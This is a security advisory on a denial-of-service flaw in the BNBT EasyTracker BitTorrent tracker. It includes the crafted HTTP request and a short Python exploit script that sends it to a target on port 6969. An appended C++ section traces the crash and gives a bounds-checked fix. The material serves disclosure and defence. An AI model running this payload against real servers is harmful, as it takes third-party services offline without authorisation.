BNBT EasyTracker Remote Denial of Service Vulnerability
by Sowhat
Last Update: 2005.08.30
http://secway.org/advisory/AD20050830.txt

Vendor:
http://bnbteasytracker.sourceforge.net/

Product Affected:
7.7r3.2004.10.27 and below

Overview:
BNBT was written by Trevor Hogan. BNBT is a complete port of the original Python BitTorrent tracker to C++ for speed and efficiency. BNBT also offers many additional features beyond the original Python BitTorrent tracker, plus it's easy to use and customizable. BNBT is covered under the GNU Lesser General Public License (LGPL).

A Denial of Service vulnerability exists within BNBT which allows an attacker to cause BNBT to stop responding.

Details:
A specifically crafted HTTP request will cause the BNBT server to stop responding.

Sending a request like "GET /index.htm HTTP/1.1\r\n:\r\n\r\n" will reproduce the problem. It seems that the bug is located in client.cpp, in the "//grab headers" section. It looks like something along the lines of "1-2 = -1", similar to a memcpy(-1)?

    // grab headers
    string :: size_type iNewLine = m_strReceiveBuf.find( "\r\n" );
    string :: size_type iDoubleNewLine = m_strReceiveBuf.find( "\r\n\r\n" );

    strTemp = m_strReceiveBuf.substr( iNewLine + strlen( "\r\n" ), iDoubleNewLine - iNewLine - strlen( "\r\n" ) );

    while( 1 )
    {
        string :: size_type iSplit = strTemp.find( ":" );
        string :: size_type iEnd = strTemp.find( "\r\n" );

        if( iSplit == string :: npos )
        {
            UTIL_LogPrint( "client warning - malformed HTTP request (bad header)\n" );
            break;
        }

        string strKey = strTemp.substr( 0, iSplit );
        string strValue = strTemp.substr( iSplit + strlen( ": " ), iEnd - iSplit - strlen( "\r\n" ) ); //Bug here ??

        rqst.mapHeaders.insert( pair<string, string>( strKey, strValue ) );

        strTemp = strTemp.substr( iEnd + strlen( "\r\n" ) );

        if( iEnd == string :: npos )
            break;
    }

However, I am not quite sure about that, and since it seems to be only a DoS I haven't dug any deeper into it.

Exploit:

    //BNBTDOS.py
    # BNBT EasyTracker Remote D.O.S Exploit
    # Bug discovered and coded by Sowhat
    # http://secway.org
    # Version 7.7r3.2004.10.27 and below
    # the BNBT project: http://bnbteasytracker.sourceforge.net/

    import sys
    import string
    import socket

    if (len(sys.argv) != 2):
        print "\nUsage: " + sys.argv[0] + " TargetIP\n"
        print "##################################################################"
        print "#                                                                #"
        print "#             BNBT EasyTracker Remote D.O.S Exploit              #"
        print "#             Bug discovered and coded by Sowhat                 #"
        print "#             http://secway.org                                  #"
        print "##################################################################"
        sys.exit(0)

    host = sys.argv[1]
    port = 6969

    payload = "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send(payload)
    s.close()

WORKAROUND:
No workaround this time. Please check the vendor's website for an update; maybe there will be a patch later (?)

Vendor Response:
2005.08.22 Vendor notified via web form; no email address found
2005.08.30 Vendor no response. Advisory released

"Life is like a bug, Do you know how to exploit it ?"
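Where the crash actually comes from, traced as an added example (my own code, not BNBT's, reusing the advisory's variable names): the "grab headers" loop reduced to a function, beside a bounds-checked rewrite. On the single ":" line there is no trailing "\r\n", so iEnd is npos and iSplit + strlen(": ") is past the end of the one-character string; std::string::substr then throws std::out_of_range, and an uncaught exception ends the tracker process. Both functions assume the caller already has a complete request in the buffer.

```cpp
#include <cstring>
#include <map>
#include <stdexcept>
#include <string>

using namespace std;

// The advisory's loop, wrapped so the exception is visible instead of fatal.
// Returns false and fills `err` if std::out_of_range escapes the loop.
bool parse_headers_original(const string& buf, map<string, string>& out, string& err) {
    string::size_type iNewLine = buf.find("\r\n");
    string::size_type iDoubleNewLine = buf.find("\r\n\r\n");
    string strTemp = buf.substr(iNewLine + strlen("\r\n"), iDoubleNewLine - iNewLine - strlen("\r\n"));
    try {
        while (1) {
            string::size_type iSplit = strTemp.find(":");
            string::size_type iEnd = strTemp.find("\r\n");   // npos on the last header line
            if (iSplit == string::npos) break;               // original logs a warning here
            string strKey = strTemp.substr(0, iSplit);
            // For ":" alone: pos = iSplit + 2 = 2 > size() = 1 -> substr throws
            string strValue = strTemp.substr(iSplit + strlen(": "), iEnd - iSplit - strlen("\r\n"));
            out.insert(make_pair(strKey, strValue));
            strTemp = strTemp.substr(iEnd + strlen("\r\n"));
            if (iEnd == string::npos) break;
        }
    } catch (const out_of_range& e) {
        err = string("out_of_range: ") + e.what();
        return false;
    }
    return true;
}

// Bounds-checked rewrite: walk the header block by offsets into `buf`, never
// assuming a "\r\n" follows or that exactly ": " separates key and value.
bool parse_headers_hardened(const string& buf, map<string, string>& out, string& err) {
    string::size_type iNewLine = buf.find("\r\n");
    string::size_type iDoubleNewLine = buf.find("\r\n\r\n");
    if (iNewLine == string::npos || iDoubleNewLine == string::npos || iDoubleNewLine < iNewLine) {
        err = "incomplete request"; return false;
    }
    string::size_type pos = iNewLine + 2;
    while (pos < iDoubleNewLine) {
        string::size_type lineEnd = buf.find("\r\n", pos);   // always <= iDoubleNewLine here
        string line = buf.substr(pos, lineEnd - pos);
        string::size_type colon = line.find(':');
        if (colon == string::npos || colon == 0) { err = "malformed header line"; return false; }
        string value = line.substr(colon + 1);
        value.erase(0, value.find_first_not_of(" \t"));     // optional whitespace after ':'
        out[line.substr(0, colon)] = value;
        pos = lineEnd + 2;
    }
    return true;
}
```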